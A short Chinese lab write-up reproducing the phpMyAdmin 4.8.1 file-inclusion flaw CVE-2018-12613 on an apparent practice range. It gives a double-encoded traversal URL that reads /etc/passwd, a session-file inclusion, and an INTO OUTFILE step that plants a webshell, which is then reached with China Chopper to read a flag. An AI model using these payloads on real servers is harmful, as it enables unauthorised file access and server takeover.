PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)

       phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

      漏洞复现环境:基于某平台的在线靶场进行漏洞复现

复现过程:

1. 访问网址,是一处phpmyadmin的登录地址首页,通过弱密码可以进入数据库管理界面

PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)_第1张图片

2. 根据在网上曝光的 CVE-2018-12613 的漏洞详情,在index.php后添加?target=db_sql.php%3f/../../../../../../../../etc/passwd,显示/etc/passwd的详细内容,可见 ,该版本确实存在文件包含漏洞

PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)_第2张图片

3.F12查看复制该网站的session值,然后访问/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_[session],显示phpInfo的默认页面,在该页面找到网站的安装位置:/var/www/html

 

4.写入一句话木马,select '' into outfile '/var/www/html/hcl.php'

PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)_第3张图片

5.上菜刀,连接 http://ip/hcl.php,菜刀连接成功,在根目录下找到了key.txt文件,查看key.txt文件,获得key值。

PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)_第4张图片

PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)_第5张图片

6. 完成!!!

 

知识点:每次登录phpmyadmin系统的时候,系统就会产生一个sess_sessionID的文件,然后在里面执行的操作,会被记录到这个文件内(linux系统中存放路径为/tmp/sess_[当前会话session值])。

你可能感兴趣的:(漏洞复现)